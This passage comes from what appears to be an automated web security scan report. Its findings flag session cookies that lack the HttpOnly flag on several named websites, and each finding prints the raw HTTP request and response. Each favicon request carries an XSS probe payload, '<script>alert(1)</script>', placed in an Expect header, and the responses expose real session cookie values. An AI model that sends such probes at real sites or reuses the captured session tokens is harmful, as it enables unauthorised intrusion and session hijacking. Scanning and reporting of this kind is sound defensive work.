Set-Cookie: WDUID=%7B330CB74D%2D039F%2D49A0%2DA9C1%2D41CF52FDC3D1%7D; expires=Wed, 02-Feb-2022 05:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDSSBBSRQD=GIDIJPFAHNJJEFCAABLGCLGP; path=/
Cache-control: private
Set-Cookie: NSC_WJQ-XXX.VTBJSXBZTDSVJTFT.DPN=ffffffff095b1c9245525d5f4f58455e445a4a423662;path=/

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="/images_unique/blank.gif">here</a>.</body>

15.75. http://www.vc.edu/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vc.edu
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.vc.edu
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
Set-Cookie: CFID=1052626;expires=Fri, 26-Apr-2041 03:45:59 GMT;path=/
Set-Cookie: CFTOKEN=295e83118cbb823b-3B26501A-C377-6A35-92E84F921D835DA0;expires=Fri, 26-Apr-2041 03:45:59 GMT;path=/
Set-Cookie: JSESSIONID=843072c7a2b0d97f73f85f532b6672661b7e;path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:45:58 GMT
Content-Length: 36781


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...

15.76. http://www.waldameer.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.waldameer.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.waldameer.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404
Date: Wed, 04 May 2011 02:03:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 27039
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADBDDAQ=DEKCBIBACLNANFPJBHCGFCNP; path=/
Cache-control: private

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>404 Page Not Found</title>
<meta name="description" content="">
<meta name="keywords" content="">

...[SNIP]...

15.77. http://www.webindia123.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.webindia123.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webindia123.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 790
Content-Type: text/html
Server: Microsoft-IIS/7.0
Set-Cookie: ASPSESSIONIDSQSTQAAS=MHDNCNCAHEHJLOENBPEPLCED; path=/
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:17:15 GMT


<head>
<title>Page not Found</title>
</head>
<body topmargin="0" leftmargin="0">

<center>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<table border="0" cellpadding="0" cells
...[SNIP]...

15.78. http://www.webreserv.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.webreserv.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.webreserv.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=3BA7968851849A10CCCACC8488F2F5D7; Path=/
Content-Type: text/html;charset=ISO-8859-1
Date: Wed, 04 May 2011 04:17:44 GMT
Content-Length: 3773

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<title
...[SNIP]...

15.79. http://www.westonsupply.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.westonsupply.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.westonsupply.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 02:09:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCCSTRQDA=NKBCLNODBKOFLNMAKKIMIIND; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

15.80. http://www.wholesalefashionsquare.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wholesalefashionsquare.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wholesalefashionsquare.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 404 Not Found
Date: Wed, 04 May 2011 01:31:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 1643
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSTQRTAD=JANIGNODPGCGBENEMBIELDOD; path=/
Cache-control: private
Vary: Accept-Encoding, User-Agent


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head><title>The page cannot be found</title>
<meta http-equiv="Content-Type" content="text/htm
...[SNIP]...

15.81. http://www.wjr.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.wjr.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wjr.com
Accept: */*
Proxy-Connection: Keep-Alive
Expect: <script>alert(1)</script>

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:41:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: CP="NON DSP COR OTPa OUR IND OTC"
Content-Length: 67
Content-Type: text/html
Set-Cookie: SiteUserIsBot=0; path=/
Set-Cookie: ASPSESSIONIDASDCDCAR=JNDFDIEANCFGNJKMGINNPCLG; path=/
Cache-control: private
Set-Cookie: NSC_xKS=ffffffff09021e1d45525d5f4f58455e445a4a422215;expires=Wed, 04-May-2011 02:14:51 GMT;path=/

<br>Error, file not found: 404;http://www.wjr.com:5157/favicon.ico

15.82. http://ad.yieldmanager.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1078422&id=1127643&id=1049079&id=740663&id=1239486&id=1008090&id=1255580&id=1233239&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.truewoman.com/?id=224
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!>!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!(<xt]T!!0O<!!!!-<xt]T!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!.<xt]T!!J<E!!!!.<xt]T!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!#<x@jG!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!/<xt]T!!q:E!!!!,<xt]T!!q<+!!!!-<xt]T!!q</!!!!-<xt]T!!q<3!!!!-<xt]T!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xqZB!!ucq!!!!-<xt]T!!vRm!!!!(<xt]T!!vRq!!!!(<xt]T!!vRr!!!!(<xt]T!!vRw!!!!-<xt]T!!vRx!!!!(<xt]T!!vRy!!!!(<xt]T!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!(<xt]T!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!(<xt]T!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V~~!#5(W~~!#5([~~!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!(<xt]T!#7.'!!!!(<xt]T!#7.:!!!!(<xt]T!#7.O!!!!(<xt]T!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km.!!!!#<xl.y!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!(<xt]T!#MTF!!!!(<xt]T!#MTH!!!!(<xt]T!#MTI!!!!(<xt]T!#MTJ!!!!(<xt]T!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#RY.!!!!'<xt,H!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!.<xt]T!#SF3!!!!.<xt]T!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!(<xt]T!#UDP!!!!.<xt]T!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!'<xt,H!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]=P!!!!#<xr]Q!#]@s!!!!%<whqH!#]W%!!!!'<xt,H!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#_0B~~!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!(<xt]T!#ai7!!!!(<xt]T!#ai?!!!!(<xt]T!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m~~!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G~~!#b?y~~!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c%+~~!#c-u!!!!-<w*F]!#c?c!!!!(<xt]T!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#ePa!!!!#<xr]M!#e`Y!!!!#<xr]Q!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g,F!!!!#<xr]Q!#gHm!!!!'<xt,H!#g[h!!!!'<xt,H!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!'<xt,H!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!(<xt]T!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!(<xt]T!#tM)!!!!(<xt]T!#tn2!!!!(<xt]T!#uE=!!!!#<x9#K!#uJY!!!!.<xt]T!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!(<xt]T!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!+<xt]T!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!!1!!!!'<xt,H!$!4(!!!!'<xt,H!$!4D!!!!'<xt,H!$!8/!!!!#<xl.y!$!89!!!!'<xt,H!$!8o!!!!'<xt,H!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#Fi!!!!'<xt,H!$#G4!!!!'<xt,H!$#M.!!!!'<xt,H!$#R7!!!!(<xt]T!$#T!!!!!'<xt,H!$#T3!!!!'<xt,H!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%c]!!!!'<xt,H!$'/1!!!!#<wx=%!$'Z-!!!!(<xt]T!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(>p!!!!'<xt,H!$(Gt!!!!+<xt]T!$(Qs!!!!'<xt,H!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*Q<!!!!'<xt,H!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 302 Found
Date: Wed, 04 May 2011 01:12:29 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!(<xt]T!!0O<!!!!-<xt]T!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!.<xt]T!!J<E!!!!.<xt]T!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!#<x@jG!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!/<xt]T!!q:E!!!!,<xt]T!!q<+!!!!-<xt]T!!q</!!!!-<xt]T!!q<3!!!!-<xt]T!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xqZB!!ucq!!!!-<xt]T!!vRm!!!!(<xt]T!!vRq!!!!(<xt]T!!vRr!!!!(<xt]T!!vRw!!!!-<xt]T!!vRx!!!!(<xt]T!!vRy!!!!(<xt]T!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!(<xt]T!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!(<xt]T!#48w!!2s=<xrZD!#4O_!!!!#<y,`,!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!(<xt]T!#7.'!!!!(<xt]T!#7.:!!!!(<xt]T!#7.O!!!!(<xt]T!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km.!!!!#<xl.y!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!(<xt]T!#MTF!!!!(<xt]T!#MTH!!!!(<xt]T!#MTI!!!!(<xt]T!#MTJ!!!!(<xt]T!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#RY.!!!!'<xt,H!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!.<xt]T!#SF3!!!!.<xt]T!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!(<xt]T!#UDP!!!!.<xt]T!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!'<xt,H!#ZPp!!!!#<y,`,!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]=P!!!!#<xr]Q!#]@s!!!!%<whqH!#]W%!!!!'<xt,H!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a4,!!!!#<y,`,!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!(<xt]T!#ai7!!!!(<xt]T!#ai?!!!!(<xt]T!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c-u!!!!-<w*F]!#c?c!!!!(<xt]T!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#e9?!!!!#<y,`,!#ePa!!!!#<xr]M!#e`Y!!!!#<xr]Q!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g,F!!!!#<xr]Q!#gHm!!!!'<xt,H!#g[h!!!!'<xt,H!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#l)E!!!!#<y,`,!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!'<xt,H!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!(<xt]T!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!(<xt]T!#tM)!!!!(<xt]T!#tn2!!!!(<xt]T!#uE=!!!!#<x9#K!#uJY!!!!.<xt]T!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!(<xt]T!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!+<xt]T!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!!1!!!!'<xt,H!$!4(!!!!'<xt,H!$!4D!!!!'<xt,H!$!8/!!!!#<xl.y!$!89!!!!'<xt,H!$!8o!!!!'<xt,H!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$!_`!!!!#<y,`,!$#3q!!!!(<x+Z1!$#Fi!!!!'<xt,H!$#G4!!!!'<xt,H!$#M.!!!!'<xt,H!$#R7!!!!(<xt]T!$#S3!!!!#<y,`,!$#T!!!!!'<xt,H!$#T3!!!!'<xt,H!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%c]!!!!'<xt,H!$%gQ!!!!#<y,`,!$'/1!!!!#<wx=%!$'Z-!!!!(<xt]T!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(>p!!!!'<xt,H!$(Gt!!!!+<xt]T!$(Qs!!!!'<xt,H!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*Q<!!!!'<xt,H!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; path=/; expires=Fri, 03-May-2013 01:12:29 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Location: http://www.googleadservices.com/pagead/conversion/1034849195/?label=f7QfCK34qQMQq5e67QM&amp;guid=ON&amp;script=0
Cache-Control: no-store
Last-Modified: Wed, 04 May 2011 01:12:29 GMT
Pragma: no-cache
Content-Length: 0
Age: 0
Proxy-Connection: close


15.83. http://ad.yieldmanager.com/unpixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /unpixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /unpixel?id=1034310&id=1057229&id=1056962&id=744655&id=744651&id=744650&id=1062338&id=1057010&t=2 HTTP/1.1
Host: ad.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://www.truewoman.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
